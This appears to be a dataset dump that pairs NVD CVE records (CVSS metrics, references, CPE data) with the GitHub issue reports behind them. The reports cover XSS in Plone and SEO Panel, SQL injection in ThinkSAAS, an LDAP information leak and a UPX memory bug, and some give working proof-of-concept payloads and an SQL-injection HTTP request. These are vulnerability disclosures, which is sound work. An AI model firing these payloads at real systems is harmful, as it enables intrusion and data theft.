https://api.github.com/repos/libass/libass/issues/423/comments
3
2020-08-29T07:31:47Z
2020-11-02T02:28:51Z
https://github.com/libass/libass/issues/423
688,480,318
423
1,772
CVE-2021-29002
2021-03-24T15:15:12.737
A stored cross-site scripting (XSS) vulnerability in Plone CMS 5.2.3 exists in site-controlpanel via the "form.widgets.site_title" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/plone/Products.CMFPlone/issues/3255" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49668" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/plone/Products.CMFPlone/issues/3255" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/49668" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:plone:plone:5.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "C8ECC7FD-E3FF-47F8-8932-55AD502B1B82", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/plone/Products.CMFPlone/issues/3255
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "plone", "Products.CMFPlone" ]
Hi Team, Description: Stored XSS, also known as persistent XSS, is more damaging than non-persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Vulnerable Parameter: form.widgets.site_title Affected version: 5.2.3 XSS payload: <ScRiPt>alert(1)</ScRiPt> Steps to reproduce the issue: 1- Goto https://localhost/ where Plone 5.2.3 version is installed. 2- Click on "Log in now" and Login as "Manager" 3- Navigate to Manager=>Site Setup=>Site 4- Edit "Site title" field to "xyz<ScRiPt>alert(1)</ScRiPt>" Video POC: https://drive.google.com/file/d/1J6ZFYmM9dpI2aPQP43fRIqe9N-uR4BIe/view?usp=sharing Impact: XSS can use to steal cookies, password or to run arbitrary code on a victim's browser Reference: https://hackerone.com/reports/485748 https://hackerone.com/reports/484434 https://hackerone.com/reports/643908 Regards, Piyush Patil
Stored XSS in "Title" field
https://api.github.com/repos/plone/Products.CMFPlone/issues/3255/comments
1
2021-03-03T07:13:08Z
2021-03-18T14:00:37Z
https://github.com/plone/Products.CMFPlone/issues/3255
820,823,397
3,255
1,773
CVE-2020-35337
2021-03-24T16:15:15.197
ThinkSAAS before 3.38 contains a SQL injection vulnerability through app/topic/action/admin/topic.php via the title parameter, which allows remote attackers to execute arbitrary SQL commands.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.unc1e.com/2020/12/thinksaas-has-post-auth-sql-injection.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/thinksaas/ThinkSAAS/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://blog.unc1e.com/2020/12/thinksaas-has-post-auth-sql-injection.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/thinksaas/ThinkSAAS/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thinksaas:thinksaas:*:*:*:*:*:*:*:*", "matchCriteriaId": "09208CC8-EC3B-445E-9AF5-16AF384E9F25", "versionEndExcluding": "3.38", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/thinksaas/ThinkSAAS/issues/24
[ "Third Party Advisory" ]
github.com
[ "thinksaas", "ThinkSAAS" ]
- Details can be retrived in [https://blog.unc1e.com/2020/12/thinksaas-has-post-auth-sql-injection.html](https://blog.unc1e.com/2020/12/thinksaas-has-post-auth-sql-injection.html) - PDF, [Thinksaas has a Post-Auth SQL injection vulnerability in app_topic_action_admin_topic.php.pdf](https://github.com/thinksaas/ThinkSAAS/files/5635300/Thinksaas.has.a.Post-Auth.SQL.injection.vulnerability.in.app_topic_action_admin_topic.php.pdf) - Author of the vuln: Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) # app/topic/action/admin/topic.php 的title参数存在SQL注入漏洞 ``` GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1 Host: thinksaas User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3; ts_autologin=goh59atl3dsk44o4sws48s80co44ww8 Upgrade-Insecure-Requests: 1 ``` Will cause a delay of 6 seconds
Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php SQL注入
https://api.github.com/repos/thinksaas/ThinkSAAS/issues/24/comments
2
2020-12-03T10:11:46Z
2020-12-08T10:55:54Z
https://github.com/thinksaas/ThinkSAAS/issues/24
756,055,263
24
1,774
CVE-2021-29008
2021-03-25T20:15:13.383
A cross-site scripting (XSS) issue in SEO Panel 4.8.0 allows remote attackers to inject JavaScript via webmaster-tools.php in the "to_time" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seopanel/Seo-Panel/issues/211" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seopanel/Seo-Panel/issues/211" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/seopanel/Seo-Panel/issues/211
[ "Exploit", "Third Party Advisory" ]
github.com
[ "seopanel", "Seo-Panel" ]
Hi team, I would like to report XSS vulnerability. **Description** A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. ___ **XSS Payload:** 2021-03-17"autofocus onfocus=alert(1) //" ___ **Vulnerable parameter:** to_time ___ **Steps to Reproduce the Issue:** 1- Login to SEO admin panel 2- Paste below POC: `https://localhost/seopanel/webmaster-tools.php?fromPopUp=1&from_time=2021-03-02&rep=1&sec=viewWebsiteSearchReports&to_time=2021-03-17"autofocus onfocus=alert(1) //"&website_id=1` As you can see, XSS is triggered and can send cookies to attacker. ___ **Video POC:** https://drive.google.com/file/d/1EXu6uO7TOJLIaLbLpjuG-NbVW6GMI-vc/view?usp=sharing ___ **Impact** With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
XSS Vulnerability in "to_time" parameter
https://api.github.com/repos/seopanel/Seo-Panel/issues/211/comments
0
2021-03-19T12:46:12Z
2021-03-22T07:51:12Z
https://github.com/seopanel/Seo-Panel/issues/211
835,951,726
211
1,775
CVE-2021-29009
2021-03-25T20:15:13.460
A cross-site scripting (XSS) issue in SEO Panel 4.8.0 allows remote attackers to inject JavaScript via archive.php in the "type" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seopanel/Seo-Panel/issues/210" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seopanel/Seo-Panel/issues/210" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/seopanel/Seo-Panel/issues/210
[ "Exploit", "Third Party Advisory" ]
github.com
[ "seopanel", "Seo-Panel" ]
Hi team, I would like to report XSS vulnerability. **Description** A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. ___ **XSS Payload:** 1"autofocus onfocus=alert(1) //" ___ **Vulnerable parameter:** type ___ **Steps to Reproduce the Issue:** 1- Login to SEO admin panel 2- Paste below POC: `https://localhost/seopanel/archive.php?from_time=2021-03-18&order_col=followers&order_val=ASC&report_type=social-media-reports&search_name=&sec=reportSummary&to_time=2021-03-19&type=1"autofocus onfocus=alert(1) //"&website_id=0` As you can see, XSS is triggered and can send cookies to attacker. ___ **Video POC:** https://drive.google.com/file/d/1d0TcAaax4Rfp1yKrqxhAY9W2plLtiXug/view?usp=sharing ___ **Impact** With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
XSS Vulnerability in "type" parameter
https://api.github.com/repos/seopanel/Seo-Panel/issues/210/comments
0
2021-03-19T12:43:40Z
2021-03-22T07:50:37Z
https://github.com/seopanel/Seo-Panel/issues/210
835,949,327
210
1,776
CVE-2021-29010
2021-03-25T20:15:13.523
A cross-site scripting (XSS) issue in SEO Panel 4.8.0 allows remote attackers to inject JavaScript via archive.php in the "report_type" parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seopanel/Seo-Panel/issues/212" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seopanel/Seo-Panel/issues/212" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA338EF9-AC8B-411D-8BE3-9F9A2E68F8E0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/seopanel/Seo-Panel/issues/212
[ "Exploit", "Third Party Advisory" ]
github.com
[ "seopanel", "Seo-Panel" ]
Hi team, I would like to report XSS vulnerability. **Description** A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. ___ **XSS Payload:** 1"autofocus onfocus=alert(1) //" ___ **Vulnerable parameter:** report_type ___ **Steps to Reproduce the Issue:** 1- Login to SEO admin panel 2- Paste below POC: `https://localhost/seopanel/archive.php?from_time=2021-03-18&order_col=url&order_val=DESC&report_type=1"autofocus onfocus=alert(1) //"&search_name=&sec=reportSummary&to_time=2021-03-19&type=&website_id=http://www.example.com ` As you can see, XSS is triggered and can send cookies to attacker. ___ **Video POC:** https://drive.google.com/file/d/1yRe3YtSYStd4k6bxC1jSAXlt8aMez1zS/view?usp=sharing ___ **Impact** With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.
XSS Vulnerability in "report_type" parameter
https://api.github.com/repos/seopanel/Seo-Panel/issues/212/comments
0
2021-03-19T12:50:19Z
2021-03-22T06:57:36Z
https://github.com/seopanel/Seo-Panel/issues/212
835,955,724
212
1,777
CVE-2020-35518
2021-03-26T17:15:12.280
When binding against a DN during authentication, the reply from 389-ds-base will be different whether the DN exists or not. This can be used by an unauthenticated attacker to check the existence of an entry in the LDAP database.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905565" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/commit/b6aae4d8e7c8a6ddd21646f94fef1bf7f22c3f32" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/commit/cc0f69283abc082488824702dae485b8eae938bc" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/issues/4480" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1905565" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/commit/b6aae4d8e7c8a6ddd21646f94fef1bf7f22c3f32" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/commit/cc0f69283abc082488824702dae485b8eae938bc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/389ds/389-ds-base/issues/4480" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:389_directory_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "826F6485-30A1-49A6-8E66-4F53DAD03EDE", "versionEndExcluding": "1.4.3.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:389_directory_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "7273B979-C446-45CA-A601-9F81F6DA503C", "versionEndExcluding": "1.4.4.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.4.0", "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:389_directory_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "72D21DC8-ED0C-4C96-A9CF-0EE1E3EBD7F9", "versionEndExcluding": "2.0.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:directory_server:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A169F6D-88A5-4631-9D30-519350ACFE6E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "203" ]
203
https://github.com/389ds/389-ds-base/issues/4480
[ "Patch", "Third Party Advisory" ]
github.com
[ "389ds", "389-ds-base" ]
**Issue Description** A ldap result can contain additional information. Such information should not allow a client application to guess if an entry exists or not **Package Version and Platform:** This bug impacts all release after 1.4.2.3 **Steps to Reproduce** to be provided with an automatic testcase **Expected results** A ldap request should not provide any tips if an entry exists or not
Unexpected info returned to ldap request
https://api.github.com/repos/389ds/389-ds-base/issues/4480/comments
8
2020-12-08T16:04:36Z
2021-04-12T10:24:56Z
https://github.com/389ds/389-ds-base/issues/4480
759,569,837
4,480
1,778
CVE-2021-20285
2021-03-26T17:15:13.140
A flaw was found in upx canPack in p_lx_elf.cpp in UPX 3.96. This flaw allows attackers to cause a denial of service (SEGV or buffer overflow and application crash) or possibly have unspecified other impacts via a crafted ELF. The highest threat from this vulnerability is to system availability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 8.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 8.5, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.6, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 4.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937787" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/421" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1937787" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/421" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:3.96:*:*:*:*:*:*:*", "matchCriteriaId": "70995404-A343-41AF-9170-590CFEAA901B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/upx/upx/issues/421
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
<!--- IF YOU REMOVE THIS TEMPLATE WE WILL CLOSE YOUR ISSUE WITHOUT RESPONSE. Just read it and fill in the details we're asking, it saves so much of our time. Thanks! --> ## What's the problem (or question)? <!--- If describing a bug, tell us what happens instead of the expected behavior --> <!--- If suggesting a change/improvement, explain the difference from current behavior --> An issue was discovered in upx 3.96(**devel** branch), There is an illegal memory access in function canPack at p_lx_elf.cpp:2571. I also check the newest release version meet the same crash, lies at p_lx_elf.cpp:2490. ## What should have happened? <!--- If you're describing a bug, tell us what should happen --> <!--- If you're suggesting a change/improvement, tell us how it should work --> no illegal memory access (crash) ## Do you have an idea for a solution? <!--- Not obligatory, but suggest a fix/reason for the bug, --> <!--- or ideas how to implement the addition or change --> check the relocation_offset and do not access the illegal memory ## How can we reproduce the issue? <!--- Provide unambiguous set of steps to reproduce this bug. Include code to reproduce, if relevant --> 1. Compile the devel branch with sanitize open `export BUILD_TYPE_SANITIZE=1; make all` 2. Use `upx.out poc` and get crash download the [poc](https://drive.google.com/file/d/1A-Xdx6QwEmtKij4IX3KbzNuNBnxbClYw/view?usp=sharing) here. ### source ```c 2566 unsigned rel_off = get_te64(&dynseg[-1+ z_rel].d_val); 2567 Elf64_Rela *rp = (Elf64_Rela *)&file_image[rel_off]; 2568 unsigned relsz = get_te64(&dynseg[-1+ z_rsz].d_val); 2569 Elf64_Rela *last = (Elf64_Rela *)(relsz + (char *)rp); 2570 for (; rp < last; ++rp) { 2571 unsigned r_va = get_te64(&rp->r_offset); 2572 if (r_va == user_init_ava) { // found the Elf64_Rela 2573 unsigned r_info = get_te64(&rp->r_info); 2574 unsigned r_type = ELF64_R_TYPE(r_info); 2575 if (Elf64_Ehdr::EM_AARCH64 == e_machine 2576 && R_AARCH64_RELATIVE == r_type) { 2577 user_init_va = get_te64(&rp->r_addend); 2578 } ``` the source code didn't check the **rel_off** so get an illegal rp ### debug ![image](https://user-images.githubusercontent.com/23634386/98940951-cb04b380-2526-11eb-9dd5-6734b7298007.png) ### bug report ```bash ASAN:SIGSEGV ================================================================= ==65507==ERROR: AddressSanitizer: SEGV on unknown address 0x6300004013e8 (pc 0x00000055aff0 bp 0x0c3600003e31 sp 0x7ffc8f9b7378 T0) #0 0x55afef in get_le64(void const*) /home/wanghao/upx_dev/src/bele_policy.h:193 #1 0x55afef in N_BELE_RTP::LEPolicy::get64(void const*) const /home/wanghao/upx_dev/src/bele_policy.h:194 #2 0x49dfe2 in Packer::get_te64(void const*) const /home/wanghao/upx_dev/src/packer.h:297 #3 0x49dfe2 in PackLinuxElf64::canPack() /home/wanghao/upx_dev/src/p_lx_elf.cpp:2571 #4 0x5240a6 in try_pack /home/wanghao/upx_dev/src/packmast.cpp:91 #5 0x52518f in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /home/wanghao/upx_dev/src/packmast.cpp:194 #6 0x526d19 in PackMaster::getPacker(InputFile*) /home/wanghao/upx_dev/src/packmast.cpp:240 #7 0x526e3c in PackMaster::pack(OutputFile*) /home/wanghao/upx_dev/src/packmast.cpp:260 #8 0x55bede in do_one_file(char const*, char*) /home/wanghao/upx_dev/src/work.cpp:158 #9 0x55c3ae in do_files(int, int, char**) /home/wanghao/upx_dev/src/work.cpp:271 #10 0x403dbe in main /home/wanghao/upx_dev/src/main.cpp:1538 #11 0x7f702527783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) ``` ## Please tell us details about your environment. <!--- Include as many relevant details about the environment you experienced the bug in --> * UPX version used (both `upx 3.96(devel)` and `upx 3.96 release`): * Host Operating System and version: ubuntu 16.04 * Host CPU architecture: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz * Target Operating System and version: ubuntu 16.04 * Target CPU architecture: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
canPack@p_lx_elf.cpp:2571 BufferOverflow (both latest release version and devel version)
https://api.github.com/repos/upx/upx/issues/421/comments
2
